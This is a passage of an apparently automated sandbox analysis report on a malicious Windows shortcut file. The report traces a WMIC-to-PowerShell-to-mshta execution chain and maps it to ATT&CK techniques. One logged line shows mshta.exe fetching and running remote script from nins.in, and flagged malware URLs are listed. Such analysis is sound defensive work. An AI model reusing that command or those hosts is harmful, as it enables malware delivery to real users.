Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: s0zqlmETpm.lnkLNK file: ..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1782Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1318Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6920Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7604Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000007.00000002.2492262200.00000245A5687000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A5687000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWlorer_Server
Source: mshta.exe, 00000007.00000002.2492262200.00000245A56DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A56DB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2494929792.0000029E1AA59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000007.00000002.2492262200.00000245A564A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337635733.00000245A564D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2493375093.0000029E15227000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://nins.in/powersearchqueerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Windows Management Instrumentation
1
DLL Side-Loading
11
Process Injection
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
LSASS Memory11
Process Discovery
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571236 Sample: s0zqlmETpm.lnk Startdate: 09/12/2024 Architecture: WINDOWS Score: 96 24 nins.in 2->24 26 cdn.jsinit.directfwd.com 2->26 32 Multi AV Scanner detection for domain / URL 2->32 34 Antivirus detection for URL or domain 2->34 36 Windows shortcut file (LNK) starts blacklisted processes 2->36 38 5 other signatures 2->38 8 WMIC.exe 1 2->8         started        11 svchost.exe 1 1 2->11         started        signatures3 process4 dnsIp5 40 Contains functionality to create processes via WMI 8->40 42 Creates processes via WMI 8->42 14 powershell.exe 7 8->14         started        17 conhost.exe 1 8->17         started        30 127.0.0.1 unknown unknown 11->30 signatures6 process7 signatures8 44 Windows shortcut file (LNK) starts blacklisted processes 14->44 19 mshta.exe 14 14->19         started        22 conhost.exe 14->22         started        process9 dnsIp10 28 nins.in 216.10.240.70, 443, 49699 PUBLIC-DOMAIN-REGISTRYUS India 19->28

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
s0zqlmETpm.lnk16%ReversingLabsWin32.Trojan.Cross
s0zqlmETpm.lnk31%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
nins.in10%VirustotalBrowse
cdn.jsinit.directfwd.com11%VirustotalBrowse
SourceDetectionScannerLabelLink
http://cdn.jsinit.directfwd.com/EK100%Avira URL Cloudmalware
https://nins.in/powersearchqueeription0%Avira URL Cloudsafe
http://cdn.jsinit.directfwd.com/sk-jspark_init.phpZW100%Avira URL Cloudmalware
http://cdn.jsinit.directfwd.com/sk-jspark_init.phpINetCookiesr100%Avira URL Cloudmalware
https://nins.in/powersearchqueer...wW0%Avira URL Cloudsafe
https://nins.in/powersearchqueerhttps://nins.in/powersearchqueer0%Avira URL Cloudsafe
https://nins.in/powersearchqueer$global:?0%Avira URL Cloudsafe
https://nins.in/powersearchqueer...0%Avira URL Cloudsafe
https://nins.in/powersearchqueer-W0%Avira URL Cloudsafe
https://nins.in/powersearchqueerM0%Avira URL Cloudsafe
https://nins.in/powersearchqueerK0%Avira URL Cloudsafe
https://nins.in/powersearchqueerk-jspark_init.phpINetCookiesr0%Avira URL Cloudsafe
https://nins.in/powersearchqueerH0%Avira URL Cloudsafe
https://nins.in/powersearchqueer0%Avira URL Cloudsafe
https://nins.in/powersearchqueerC:0%Avira URL Cloudsafe
http://cdn.jsinit.directfwd.com/sk-jspark_init.phpSW100%Avira URL Cloudmalware
https://nins.in/powersearchqueerON=8f0890%Avira URL Cloudsafe
http://cdn.jsinit.directfwd.com/sk-jspark_init.phpsq100%Avira URL Cloudmalware
https://nins.in/0%Avira URL Cloudsafe
https://nins.in/powersearchqueerveEventt0%Avira URL Cloudsafe
https://nins.in/powersearchqueery0%Avira URL Cloudsafe
https://nins.in/powersearchqueer90%Avira URL Cloudsafe
https://nins.in/powersearchqueerx0%Avira URL Cloudsafe
http://cdn.jsinit.directfwd.com/sk-jspark_init.phpHistoryHistory.IE5100%Avira URL Cloudmalware
https://nins.in/powersearchqueer30%Avira URL Cloudsafe
http://cdn.jsinit.directfwd.com/100%Avira URL Cloudmalware
https://nins.in/powersearchqueer/0%Avira URL Cloudsafe
https://nins.in/powersearchqueer00%Avira URL Cloudsafe
http://cdn.jsinit.directfwd.com/sk-jspark_init.phpAW100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
nins.in
216.10.240.70
truetrueunknown
cdn.jsinit.directfwd.com
unknown
unknownfalseunknown
NameMaliciousAntivirus DetectionReputation
https://nins.in/powersearchqueertrue
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://cdn.jsinit.directfwd.com/sk-jspark_init.phpmshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337570086.00000245A56FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.2493522663.0000024DA7430000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337609873.00000245A5700000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.2495774836.0000024DA8285000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1337570086.00000245A56F9000.00000004.00000020.00020000.00000000.sdmpfalse
    high
    http://cdn.jsinit.directfwd.com/EKmshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    unknown
    http://cdn.jsinit.directfwd.com/sk-jspark_init.phpINetCookiesrmshta.exe, 00000007.00000003.1337635733.00000245A5687000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    unknown
    http://cdn.jsinit.directfwd.com/sk-jspark_init.phpZWmshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    unknown
    https://nins.in/powersearchqueer...wWmshta.exe, 00000007.00000002.2494779872.0000024DA8192000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    https://nins.in/powersearchqueeriptionWMIC.exe, 00000000.00000003.1249009501.000001BED3223000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000003.1249352677.000001BED3223000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000002.1249795408.000001BED3223000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    https://nins.in/powersearchqueerhttps://nins.in/powersearchqueermshta.exe, 00000007.00000002.2495774836.0000024DA8285000.00000004.00000800.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
